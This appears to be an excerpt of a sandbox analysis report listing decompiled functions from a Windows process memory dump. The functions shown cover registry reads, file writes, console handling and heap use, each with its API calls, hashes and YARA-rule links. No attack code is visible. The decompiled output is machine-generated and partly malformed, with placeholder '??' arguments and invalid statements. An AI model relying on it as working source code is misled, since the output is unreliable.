							_t35 = E4A731896( *(_t43 - 0x24));
							 *(_t43 - 0x20) = _t35;
							if(_t35 == 0) {
								_push(8);
								goto L11;
							} else {
								_t40 = RegQueryValueExW( *(_t43 - 0x1c), 0, 0, _t43 + 0xc, _t35, _t43 - 0x24);
								if(_t40 != 0) {
									E4A73142E(_t35);
									 *(_t43 - 0x20) = 0;
									_push(_t40);
									goto L11;
								}
							}
						}
					} else {
						 *(_t43 - 0x20) = E4A7319D6(E4A733AFC);
					}
				} else {
					_t24 = RegOpenKeyExW(_t36, _t21, 0, 1, _t43 - 0x1c);
					if(_t24 == 0) {
						goto L4;
					} else {
						L3:
						_push(_t24);
						L11:
						SetLastError();
					}
				}
				 *((intOrPtr*)(_t43 - 4)) = 0xfffffffe;
				E4A74D0C7();
				return E4A7313B6( *(_t43 - 0x20));
			}

0x4a74d003
0x4a74d005
0x4a74d00a
0x4a74d011
0x4a74d014
0x4a74d017
0x4a74d01a
0x4a74d01d
0x4a74d020
0x4a74d025
0x4a74d042
0x4a74d056
0x4a74d05b
0x4a74d06e
0x00000000
0x4a74d070
0x4a74d078
0x4a74d07a
0x4a74d07f
0x4a74d0a3
0x00000000
0x4a74d081
0x4a74d091
0x4a74d095
0x4a74d098
0x4a74d09d
0x4a74d0a0
0x00000000
0x4a74d0a0
0x4a74d095
0x4a74d07f
0x4a74d05d
0x4a74d067
0x4a74d067
0x4a74d02c
0x4a74d035
0x4a74d03d
0x00000000
0x4a74d03f
0x4a74d03f
0x4a74d03f
0x4a74d0a5
0x4a74d0a5
0x4a74d0a5
0x4a74d03d
0x4a74d0ab
0x4a74d0b2
0x4a74d0bf

APIs

RegOpenKeyExW.KERNEL32 ref: 4A74D035
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A74D056
RegQueryValueExW.KERNEL32(?,00000000,00000000,?,00000000,?), ref: 4A74D08F
SetLastError.KERNEL32(00000000), ref: 4A74D0A5

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: QueryValue$ErrorLastOpen
String ID:
API String ID: 4270309053-0
Opcode ID: 8a8dbba58b2bbf89a8139bc48a89533def0be84943d05d3f199dcbefb2bce091
Instruction ID: 1cb01813d6fa2ff26d04115930c3d0ba62f4db5b59d5fbcce27fb010c6a7d349
Opcode Fuzzy Hash: 8a8dbba58b2bbf89a8139bc48a89533def0be84943d05d3f199dcbefb2bce091
Instruction Fuzzy Hash: C42109B1906129BBCB309B94CC488EE7FBDAB49B50F118456F445A7162D774894ACBB0

Uniqueness

Uniqueness Score: -1.00%

Function 4A741BE3, Relevance: 6.1, APIs: 4, Instructions: 66
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E4A741BE3(intOrPtr _a4, char _a8, FILETIME* _a12, intOrPtr _a16) {
				char _v8;
				void* __ecx;
				void* _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				intOrPtr _t19;
				void* _t24;
				char _t27;
				FILETIME* _t30;
				intOrPtr* _t33;

				_t27 = _a8;
				_t13 =  *((intOrPtr*)(_t27 + 0x20));
				_v8 = 0x1a;
				if( *((intOrPtr*)(_t27 + 0x20)) == 0) {
					_t13 = _t27;
				}
				_t14 = E4A741C6C(_t13);
				_t30 = _a12;
				_t33 = __imp___get_osfhandle;
				if(_t14 != 0) {
					_t15 = E4A733B03(_t14, _t27, _t30);
					if(_t15 == 0) {
						_t24 =  *_t33( &_v8, 1,  &_a8, _t15);
						_t27 = _t30;
						WriteFile(_t24, ??, ??, ??, ??);
					}
				}
				_t16 = _a4;
				if(_t16 != 0 && ( *(_t16 + 0x1c) & 0x00000080) == 0 && E4A733B03(_t16, _t27, _t30) == 0) {
					_t19 =  *0x4a754168; // 0x0
					if(_t19 != 3 && _a16 != 0 && _t19 != 2) {
						SetFileTime( *_t33(_a16), _t30, 0, 0);
					}
				}
				_t17 = E4A733AB3(_t30);
				 *0x4a754164 =  *0x4a754164 + 1;
				return _t17;
			}

0x4a741be9
0x4a741bec
0x4a741bef
0x4a741bf8
0x4a748719
0x4a748719
0x4a741c01
0x4a741c06
0x4a741c09
0x4a741c11
0x4a748721
0x4a748728
0x4a74873a
0x4a74873c
0x4a74873e
0x4a74873e
0x4a748728
0x4a741c17
0x4a741c1c
0x4a741c2e
0x4a741c36
0x4a741c4f
0x4a741c4f
0x4a741c36
0x4a741c56
0x4a741c5b
0x4a741c64

APIs

_get_osfhandle.MSVCRT ref: 4A741C4B
SetFileTime.KERNEL32(00000000,?,4A7494D2,?,?,000000FF,00000000), ref: 4A741C4F
_get_osfhandle.MSVCRT ref: 4A74873A
WriteFile.KERNEL32(00000000,?,4A7494D2,?,?), ref: 4A74873E

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File_get_osfhandle$TimeWrite
String ID:
API String ID: 4019809305-0
Opcode ID: 9049c7071ffda9ee65a127335c6a058e0ce4fbc14d1564740539e38ccc539ae9
Instruction ID: ca2366afa92894a900adb4b259ccd68feefc81ff61c0ebecc58f38304586fed2
Opcode Fuzzy Hash: 9049c7071ffda9ee65a127335c6a058e0ce4fbc14d1564740539e38ccc539ae9
Instruction Fuzzy Hash: 3E11C17224A229BBEB71AE50CD49FBB3F7CEB82690F020015F902D7181D734D949DB61

Uniqueness

Uniqueness Score: -1.00%

Function 4A74F619, Relevance: 6.1, APIs: 4, Instructions: 60
fileCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E4A74F619(intOrPtr _a4, intOrPtr _a8, char _a12, WCHAR* _a16, intOrPtr _a20) {
				void* _t10;
				int _t11;
				void* _t19;
				void* _t20;
				char _t22;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr _t28;

				_t22 = _a12;
				_t10 =  &_a12;
				_t19 = 0;
				__imp___get_osfhandle(_a4, _a8, _t22, _t10, 0);
				_pop(_t20);
				_t11 = WriteFile(_t10, ??, ??, ??, ??);
				if(_t11 == 0 || _t22 != _a12) {
					L3:
					 *0x4a754128 = GetLastError();
					E4A733AB3(_a20);
					if(E4A733B03(E4A733AB3(_a4), _t20, _a4) == 0) {
						DeleteFileW(_a16);
					} else {
						_t19 = 0x1d;
					}
					 *0x4a754120 = 0;
					_t27 =  *0x4a754128; // 0x0
					if(_t27 == 0) {
						 *0x4a754128 = 0x70;
					}
					_t28 =  *0x4a7541b4; // 0x0
					if(_t28 == 0) {
						if(_t19 == 0) {
							E4A74056B( *0x4a754128);
						}
					} else {
						_t19 = 0;
					}
					return L4A74F2D7(_t20, _t19, 1);
				} else {
					_t25 =  *0x4a7541b4; // 0x0
					if(_t25 == 0) {
						return _t11;
					}
					goto L3;
				}
			}

0x4a74f620
0x4a74f627
0x4a74f62f
0x4a74f634
0x4a74f63a
0x4a74f63c
0x4a74f644
0x4a74f653
0x4a74f65c
0x4a74f661
0x4a74f678
0x4a74f682
0x4a74f67a
0x4a74f67c
0x4a74f67c
0x4a74f688
0x4a74f68e
0x4a74f694
0x4a74f696
0x4a74f696
0x4a74f6a0
0x4a74f6a6
0x4a74f6ae
0x4a74f6b6
0x4a74f6b6
0x4a74f6a8
0x4a74f6a8
0x4a74f6a8
0x00000000
0x4a74f64b
0x4a74f64b
0x4a74f651
0x4a74f6c7
0x4a74f6c7
0x00000000
0x4a74f651

APIs

_get_osfhandle.MSVCRT ref: 4A74F634
WriteFile.KERNEL32(00000000,4A749439,000000FF,?,?), ref: 4A74F63C
GetLastError.KERNEL32 ref: 4A74F653
DeleteFileW.KERNEL32(?,?,?,?), ref: 4A74F682

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: File$DeleteErrorLastWrite_get_osfhandle
String ID:
API String ID: 2448200120-0
Opcode ID: a37990c612c04970aae64e45feb12e76c077b133269e9afb5c3998d13e2e185d
Instruction ID: 5b5120d205eaf6289337692f0a58ffe16a18673ae36f97c0e26b08f308f20276
Opcode Fuzzy Hash: a37990c612c04970aae64e45feb12e76c077b133269e9afb5c3998d13e2e185d
Instruction Fuzzy Hash: 6711E7B2589215EFEF715F61DC598DA3F7DEB85762B02002AF904D58A0C7319C58CB51

Uniqueness

Uniqueness Score: -1.00%

Function 4A73839B, Relevance: 6.1, APIs: 4, Instructions: 60
sleepCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E4A73839B(void* __eax, long __ebx, void* __edx, LONG* __edi, long __esi) {
				long _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				void* _t16;
				int _t17;
				int _t18;
				intOrPtr* _t20;
				intOrPtr _t23;
				void* _t24;
				long _t25;
				void* _t26;
				intOrPtr _t28;
				LONG* _t35;
				long _t36;
				intOrPtr _t38;
				void* _t40;
				void* _t52;
				void* _t53;

				_t36 = __esi;
				_t35 = __edi;
				_t25 = __ebx;
				[far dword [edx]();
				while(1) {
					__eflags = _t13 - _t36;
					if(__eflags == 0) {
						break;
					}
					Sleep(0x3e8);
					_t13 = InterlockedCompareExchange(_t35, _t36, _t25);
					if(_t13 != _t25) {
						continue;
					} else {
						_t38 = 1;
					}
					L3:
					_t14 =  *0x4a754200; // 0x0
					if(_t14 == _t38) {
						L4A752309();
						_t26 = 0x1f;
						goto L7;
					} else {
						_t23 =  *0x4a754200; // 0x0
						if(_t23 != 0) {
							 *0x4a77090c = _t38;
							goto L7;
						} else {
							 *0x4a754200 = _t38;
							_t24 = E4A738271(0x4a738378, 0x4a738384);
							_pop(_t26);
							if(_t24 != 0) {
								 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
								_t18 = 0xff;
								goto L26;
							} else {
								L7:
								_t15 =  *0x4a754200; // 0x0
								if(_t15 == _t38) {
									_push(0x4a738374);
									L4A737C76();
									_t26 = 0x4a73836c;
									 *0x4a754200 = 2;
								}
								if( *((intOrPtr*)(_t40 - 0x1c)) == _t25) {
									InterlockedExchange(_t35, _t25);
								}
								_t52 =  *0x4a770688 - _t25; // 0x0
								if(_t52 != 0) {
									_t16 = E4A75227C(_t25, _t35, _t38, __eflags);
									_t26 = 0x4a770688;
									__eflags = _t16;
									if(_t16 != 0) {
										 *0x4a770688(_t25, 2, _t25);
									}
								}
								_push( *0x4a75423c);
								_push( *0x4a754240);
								_push( *0x4a754238);
								_t17 = L4A737308(_t26, _t35, _t38);
								 *0x4a754274 = _t17;
								_t53 =  *0x4a754138 - _t25; // 0x0
								if(_t53 != 0) {
									__eflags =  *0x4a77090c - _t25; // 0x0
									if(__eflags == 0) {
										__imp___cexit();
									}
									 *((intOrPtr*)(_t40 - 4)) = 0xfffffffe;
									_t18 =  *0x4a754274; // 0x0
									L26:
									return E4A7313B6(_t18);
								} else {
									exit(_t17);
									_t20 =  *((intOrPtr*)(_t40 - 0x14));
									_t28 =  *((intOrPtr*)( *_t20));
									 *((intOrPtr*)(_t40 - 0x20)) = _t28;
									_push(_t20);
									_push(_t28);
									L4A7521EE();
									return _t20;
								}
							}
						}
					}
				}
				_t38 = 1;
				 *((intOrPtr*)(_t40 - 0x1c)) = 1;
				goto L3;
			}

0x4a73839b
0x4a73839b
0x4a73839b
0x4a73839b
0x4a7383a4
0x4a7383a4
0x4a7383a6
0x00000000
0x00000000
0x4a7383b8
0x4a7382c4
0x4a7382cc
0x00000000
0x4a7382d2
0x4a7382d4
0x4a7382d4
0x4a7382d5
0x4a7382d5
0x4a7382dc
0x4a7383c5
0x4a7383ca
0x00000000
0x4a7382e2
0x4a7382e2
0x4a7382e9
0x4a738363
0x00000000
0x4a7382eb
0x4a7382eb
0x4a7382fb
0x4a738301
0x4a738304
0x4a7383d0
0x4a7383d7
0x00000000
0x4a73830a
0x4a73830a
0x4a73830a
0x4a738311
0x4a738313
0x4a73831d
0x4a738323
0x4a738324
0x4a738324
0x4a738331
0x4a738335
0x4a738335
0x4a73833b
0x4a738341
0x4a7383e6
0x4a7383eb
0x4a7383ec
0x4a7383ee
0x4a7383f8
0x4a7383f8
0x4a7383ee
0x4a738347
0x4a73834d
0x4a738353
0x4a738359
0x4a738406
0x4a73840b
0x4a738411
0x4a73844a
0x4a738450
0x4a738452
0x4a738452
0x4a738458
0x4a73845f
0x4a738464
0x4a738469
0x4a738413
0x4a738414
0x4a73841a
0x4a73841f
0x4a738421
0x4a738424
0x4a738425
0x4a738426
0x4a73842d
0x4a73842d
0x4a738411
0x4a738304
0x4a7382e9
0x4a7382dc
0x4a7383aa
0x4a7383ab
0x00000000

APIs

InterlockedCompareExchange.KERNEL32(4A754204,?,00000000), ref: 4A7382C4
_initterm.MSVCRT ref: 4A73831D
InterlockedExchange.KERNEL32 ref: 4A738335
Sleep.KERNEL32(000003E8), ref: 4A7383B8
exit.MSVCRT ref: 4A738414
_XcptFilter.MSVCRT ref: 4A738426

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ExchangeInterlocked$CompareFilterSleepXcpt_inittermexit
String ID:
API String ID: 1487059562-0
Opcode ID: 7bde2b564fc007bf7d7ed0549145ab357095894e71a3c0662a95b69c185f90a5
Instruction ID: 183492b4a745661015d2ee3f2a6c822bcbd4a0f71911746f4f0308987157d9b4
Opcode Fuzzy Hash: 7bde2b564fc007bf7d7ed0549145ab357095894e71a3c0662a95b69c185f90a5
Instruction Fuzzy Hash: 0C11E2F584DA319FEBB18F60D88AA1D3FBDFB42711712005EE501DAA42E7394848CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 4A732536, Relevance: 6.1, APIs: 4, Instructions: 59
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E4A732536(void* _a4, intOrPtr _a8) {
				void* _t18;
				void* _t20;
				void* _t22;
				void* _t25;
				long _t26;

				_t11 = _a8;
				_t22 = _a4 + 0xfffffff8;
				_t3 = _t11 + 8; // 0x8
				_t26 = _t3;
				_a4 = _t22;
				if(_t26 < _a8) {
					L12:
					_push(0);
					_push(8);
					E4A736D44(_t22);
					return 0;
				}
				_t20 = HeapReAlloc(GetProcessHeap(), 0, _t22, _t26);
				if(_t20 == 0) {
					goto L12;
				}
				 *_t20 = _t26;
				HeapSize(GetProcessHeap(), 0, _t20);
				if(_t20 != _a4) {
					_t18 =  *0x4a754100; // 0x0
					if(_t18 != _a4) {
						while(_t18 != 0) {
							_t25 =  *(_t18 + 4);
							if(_t25 == _a4) {
								 *(_t18 + 4) = _t20;
								goto L3;
							}
							_t18 = _t25;
						}
						goto L3;
					}
					 *0x4a754100 = _t20;
				}
				L3:
				_t6 = _t20 + 8; // 0x8
				return _t6;
			}

0x4a73253b
0x4a732544
0x4a732547
0x4a732547
0x4a73254a
0x4a73254f
0x4a73e035
0x4a73e035
0x4a73e037
0x4a73e039
0x00000000
0x4a74777e
0x4a732568
0x4a73256c
0x00000000
0x00000000
0x4a732575
0x4a73257a
0x4a732583
0x4a734e66
0x4a734e6e
0x4a73e024
0x4a73e01a
0x4a73e020
0x4a73e02d
0x00000000
0x4a73e02d
0x4a73e022
0x4a73e022
0x00000000
0x4a73e028
0x4a734e74
0x4a734e74
0x4a732589
0x4a732589
0x00000000

APIs

GetProcessHeap.KERNEL32(00000000,-000000F8,00000008,00000000,00000000,00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002), ref: 4A73255F
HeapReAlloc.KERNEL32(00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A732562
GetProcessHeap.KERNEL32(00000000,00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A732577
HeapSize.KERNEL32(00000000,?,4A732520,00000000,00000000,00000000,?,4A732456,?,00000000,00000002,00000000,00000000,00000000), ref: 4A73257A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocSize
String ID:
API String ID: 2549470565-0
Opcode ID: 2bd57b821c6358531ceef513767f34d1e8d7a188c12ea115d0cb2a70b9010f69
Instruction ID: dd5ece28e1539f82f26777bc45a742914d341c7d2ad72046b4d163059a933375
Opcode Fuzzy Hash: 2bd57b821c6358531ceef513767f34d1e8d7a188c12ea115d0cb2a70b9010f69
Instruction Fuzzy Hash: 6B11C671319606EFD7748F94D899E5A3FE9EB403A1F128115F6088F241DB70EE44C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 4A733B03, Relevance: 6.1, APIs: 4, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E4A733B03(void* __eax, void* __ecx, intOrPtr _a4) {
				long _v8;
				intOrPtr _t13;
				void* _t17;
				void* _t18;
				void* _t24;
				void* _t25;

				__imp___get_osfhandle(_a4, _t24, __ecx);
				_t25 = __eax;
				if((GetFileType(__eax) & 0xffff7fff) == 2) {
					_t13 = _a4;
					if(_t13 == 0) {
						_push(0xfffffff6);
						goto L6;
					} else {
						_t18 = _t13 - 1;
						if(_t18 != 0) {
							if(_t18 == 1) {
								_push(0xfffffff4);
								goto L6;
							}
						} else {
							_push(0xfffffff5);
							L6:
							_t25 = GetStdHandle();
						}
					}
					if(GetConsoleMode(_t25,  &_v8) == 0) {
						 *0x4a754154 =  *0x4a754154 & 0x00000000;
					} else {
						if((_v8 & 0x00000007) == 0) {
							if((_v8 & 0x00000003) != 0) {
								 *0x4a754154 = 2;
							}
						} else {
							 *0x4a754154 = 1;
						}
					}
					_t17 = 1;
				} else {
					 *0x4a754154 =  *0x4a754154 & 0x00000000;
					_t17 = 0;
				}
				return _t17;
			}

0x4a733b0d
0x4a733b14
0x4a733b25
0x4a734a3e
0x4a734a41
0x4a7434c7
0x00000000
0x4a734a47
0x4a734a47
0x4a734a48
0x4a734b18
0x4a734b1e
0x00000000
0x4a734b1e
0x4a734a4e
0x4a734a4e
0x4a734a50
0x4a734a56
0x4a734a56
0x4a734a48
0x4a734a68
0x4a73d915
0x4a734a6e
0x4a734a72
0x4a7434d2
0x4a749da7
0x4a749da7
0x4a734a78
0x4a734a78
0x4a734a78
0x4a734a72
0x4a734a7e
0x4a733b2b
0x4a733b2b
0x4a733b32
0x4a733b32
0x4a733b36

APIs

_get_osfhandle.MSVCRT ref: 4A733B0D
GetFileType.KERNEL32(00000000), ref: 4A733B17
GetStdHandle.KERNEL32(000000F4,?,4A749E50,00000001,?,4A744FE5,%s %s ,?,?), ref: 4A734A50
GetConsoleMode.KERNEL32 ref: 4A734A5D

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleFileHandleModeType_get_osfhandle
String ID:
API String ID: 746850120-0
Opcode ID: b959d647bf60f77be3fa306bdd53277e2f7ebfec1241be571d925c88a528d47c
Instruction ID: 29e262f28bb0663e89cdc184ec3b7e07d8a2e4d5e98a60d2964be709f8b6db0c
Opcode Fuzzy Hash: b959d647bf60f77be3fa306bdd53277e2f7ebfec1241be571d925c88a528d47c
Instruction Fuzzy Hash: 0501E5B249D494ABD73587D8C9097EA3FA9E702276F030255E425C29C2D7344A48C758

Uniqueness

Uniqueness Score: -1.00%

Function 4A740AF9, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E4A740AF9(struct _COORD _a4, short _a6) {
				long _v8;
				signed short _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* _t20;
				int _t27;
				void* _t30;

				_t27 = _a4;
				if(((_t27 >> 0x00000004 ^ _t27) & 0x0000000f) == 0) {
					return 1;
				}
				_t30 = GetStdHandle(0xfffffff5);
				if(GetConsoleScreenBufferInfo(_t30,  &_v32) == 0) {
					_t20 = 1;
				} else {
					_a6 = 0;
					_a4.X = 0;
					FillConsoleOutputAttribute(_t30, _t27, _v32.dwSize * _v30, _a4,  &_v8);
					SetConsoleTextAttribute(_t30, _t27);
					_t20 = 0;
				}
				return _t20;
			}

0x4a740b02
0x4a740b0e
0x00000000
0x4a747cbe
0x4a740b1d
0x4a740b2c
0x4a740b65
0x4a740b2e
0x4a740b34
0x4a740b38
0x4a740b4d
0x4a740b55
0x4a740b5b
0x4a740b5b
0x00000000

APIs

GetStdHandle.KERNEL32(000000F5,?,00000104,?,?,?,4A740995,00000000,00000001), ref: 4A740B17
GetConsoleScreenBufferInfo.KERNEL32 ref: 4A740B24
FillConsoleOutputAttribute.KERNEL32(00000000,00000001,?,00000001,?), ref: 4A740B4D
SetConsoleTextAttribute.KERNEL32(00000000,00000001), ref: 4A740B55

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
String ID:
API String ID: 1033415088-0
Opcode ID: e1d2d998db6b1a7501d9a3b266edb8a180636652ca9d868c547e84b81a34e0d8
Instruction ID: 9ffd0b3c17f888c74194ddb65d39ae9a448871ba0c9c154eaff8f8024ac11f20
Opcode Fuzzy Hash: e1d2d998db6b1a7501d9a3b266edb8a180636652ca9d868c547e84b81a34e0d8
Instruction Fuzzy Hash: C001D673614109BF9B20AFE48C859FF7BBCEF0A695B018121FA15C6041E634CE06C3B8

Uniqueness

Uniqueness Score: -1.00%

Function 4A734490, Relevance: 6.0, APIs: 4, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E4A734490(void* __eax, intOrPtr _a4) {
				long _v8;
				void* _t5;
				intOrPtr _t9;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;

				__imp___get_osfhandle(_a4, _t18, _t16);
				_t19 = __eax;
				if(__eax == 0xffffffff || (GetFileType(__eax) & 0xffff7fff) != 2) {
					L2:
					_t5 = 0;
				} else {
					_t9 = _a4;
					if(_t9 == 0) {
						_push(0xfffffff6);
						goto L7;
					} else {
						_t14 = _t9 - 1;
						if(_t14 != 0) {
							if(_t14 == 1) {
								_push(0xfffffff4);
								goto L7;
							}
						} else {
							_push(0xfffffff5);
							L7:
							_t19 = GetStdHandle();
						}
					}
					if(GetConsoleMode(_t19,  &_v8) == 0) {
						goto L2;
					} else {
						_t5 = 1;
					}
				}
				return _t5;
			}

0x4a73449a
0x4a7344a0
0x4a7344a6
0x4a7344b9
0x4a7344b9
0x4a7344c0
0x4a7344c3
0x4a7344c6
0x4a736d71
0x00000000
0x4a7344cc
0x4a7344cc
0x4a7344cd
0x4a736d64
0x4a736d6a
0x00000000
0x4a736d6a
0x4a7344d3
0x4a7344d3
0x4a7344d5
0x4a7344db
0x4a7344db
0x4a7344cd
0x4a7344ea
0x00000000
0x4a7344ec
0x4a7344ee
0x4a7344ee
0x4a7344ea
0x4a7344bd

APIs

_get_osfhandle.MSVCRT ref: 4A73449A
GetFileType.KERNEL32(00000000), ref: 4A7344A9
GetStdHandle.KERNEL32(000000F5,?,4A7397DD,0000233A,00000000,74EC14B9,00000000,?,?,?,?,?,4A736D61,00000000,00000002,0000233A), ref: 4A7344D5
GetConsoleMode.KERNEL32 ref: 4A7344E2

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleFileHandleModeType_get_osfhandle
String ID:
API String ID: 746850120-0
Opcode ID: e4f546bb267c6c2342152bbb4f27479316b770b590f3c11c6633fa063f18d068
Instruction ID: b45634ea68a9555c9192a66b54319d22eaf56242d3c8e03979963e01187133f2
Opcode Fuzzy Hash: e4f546bb267c6c2342152bbb4f27479316b770b590f3c11c6633fa063f18d068
Instruction Fuzzy Hash: 0BF0C87315DC107A9FB44AF4CC0999A3FACD6021B6B134331E873D24D1EA24C914C795

Uniqueness

Uniqueness Score: -1.00%

Function 4A74FCA6, Relevance: 6.0, APIs: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E4A74FCA6(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t2;

				_t2 = E4A7437A5(__ecx, __edi, __esi);
				__imp__longjmp(0x4a754b40, 1);
				asm("int3");
				if( *0x4a7540b4 == 0) {
					L7:
					__eax = E4A7437A5(__ecx, __edi, __esi);
					__imp__longjmp(0x4a754b40, 1);
					asm("int3");
					 *0x4a770924 =  *0x4a770924 & 0x00000000;
					 *0x4a7706a4 = 0;
					return __eax;
				} else {
					__eax = E4A74FE1B(__ebx, __ecx, __edx, __edi, 0, 0x237b, 0x2328);
					if(__eax != 1) {
						EnterCriticalSection( *0x4a7541a4);
						 *0x4a7541b4 =  *0x4a7541b4 & 0x00000000;
						LeaveCriticalSection( *0x4a7541a4);
						return _t2;
					} else {
						__esi =  *0x4a7540b4; // 0x0
						while(__esi != 0) {
							__eax = E4A7357F4(__eax, __esi);
							__esi =  *((intOrPtr*)(__esi + 0x110));
						}
						goto L7;
					}
				}
			}

0x4a74fca6
0x4a74fcb2
0x4a74fcb8
0x4a74fcc0
0x4a74fcf4
0x4a74fcf4
0x4a74fd00
0x4a74fd06
0x4a74fd0c
0x4a74fd13
0x4a74fd1a
0x4a74fcc2
0x4a74fcce
0x4a74fcd6
0x4a731e72
0x4a731e7e
0x4a731e85
0x4a731e8b
0x4a74fcdc
0x4a74fcdc
0x4a74fcf0
0x4a74fce5
0x4a74fcea
0x4a74fcea
0x00000000
0x4a74fcf0
0x4a74fcd6

APIs

EnterCriticalSection.KERNEL32(4A73851C), ref: 4A731E72
LeaveCriticalSection.KERNEL32(?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210,?,4A731C8D), ref: 4A731E85
longjmp.MSVCRT(4A754B40,00000001,4A743723,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000,4A731E56,4A731F9D,-00000003,4A754210,4A754210), ref: 4A74FCB2
longjmp.MSVCRT(4A754B40,00000001,?,4A731DBC,?,00000021,-00000003,4A768640,4A754210,00000000,00000000,?,4A731CE6,4A768640,4A754210,4A754210), ref: 4A74FD00

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSectionlongjmp$EnterLeave
String ID:
API String ID: 4200650868-0
Opcode ID: d2cdaa30cdeab61fb610db1dcea1b95337164cf922f792da1622fa67dda62575
Instruction ID: 38ee911837b9dd41588b8b6fd979f4e3fe963cbe98bba0751414dd823533a7b1
Opcode Fuzzy Hash: d2cdaa30cdeab61fb610db1dcea1b95337164cf922f792da1622fa67dda62575
Instruction Fuzzy Hash: 67F036B29CE521ABEF719750C64FB89777AAB02B13F120400E604EECC1CB641D48D756

Uniqueness

Uniqueness Score: -1.00%

Function 4A7322CA, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 213
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E4A7322CA(signed short* _a4, intOrPtr _a8, signed int _a12) {
				signed int _v8;
				char _v208;
				signed int _v212;
				signed int _v216;
				intOrPtr _v220;
				signed int _v224;
				signed int _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t76;
				intOrPtr _t79;
				signed short _t81;
				long _t82;
				signed int _t89;
				void* _t95;
				long _t96;
				void* _t100;
				intOrPtr _t111;
				signed int _t112;
				signed int _t113;
				intOrPtr _t122;
				intOrPtr _t123;
				signed int _t125;
				signed short* _t126;
				signed int _t131;

				_t76 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t76 ^ _t131;
				_t126 = _a4;
				_v220 = _a8;
				if(_t126 == 0) {
					_t79 = E4A732041(4);
					goto L28;
				} else {
					__eax = __esi;
					_t15 = __eax + 2; // 0x2
					__edx = _t15;
					do {
						__cx =  *__eax;
						__eax = __eax + 1;
						__eax = __eax + 1;
					} while (__cx != 0);
					__eax = __eax - __edx;
					_push(__ebx);
					__eax = __eax >> 1;
					_push(__edi);
					__eax = 4 + __eax * 4;
					__eax = E4A732041(__eax);
					_v228 = __eax;
					_v212 = __eax;
					__edi = 0;
					_v216 = 0x4a754670;
					do {
						__eax = _v216;
						__ebx =  *_v216 & 0x0000ffff;
						if(__bx == 0) {
							break;
						}
						if(E4A7318EB(_v220, __ebx) == 0) {
							 *((short*)(__ebp + __edi * 2 - 0xcc)) = __bx;
							__edi = __edi + 1;
						}
						_v216 = _v216 + 2;
					} while (__edi < 0x63);
					__eax = 0;
					 *((short*)(__ebp + __edi * 2 - 0xcc)) = __ax;
					__eax = 1;
					_v224 = 1;
					_v216 = 1;
					while(1) {
						_t82 =  *_t126 & 0x0000ffff;
						if(_t82 == 0) {
							break;
						}
						if(_t82 == 0x22 || iswspace(_t82) == 0 && E4A7318EB( &_v208,  *_t126 & 0x0000ffff) == 0) {
							L17:
							_v224 = _v224 & 0x00000000;
							if(_v220 == 0 || E4A7318EB(_v220,  *_t126 & 0x0000ffff) == 0) {
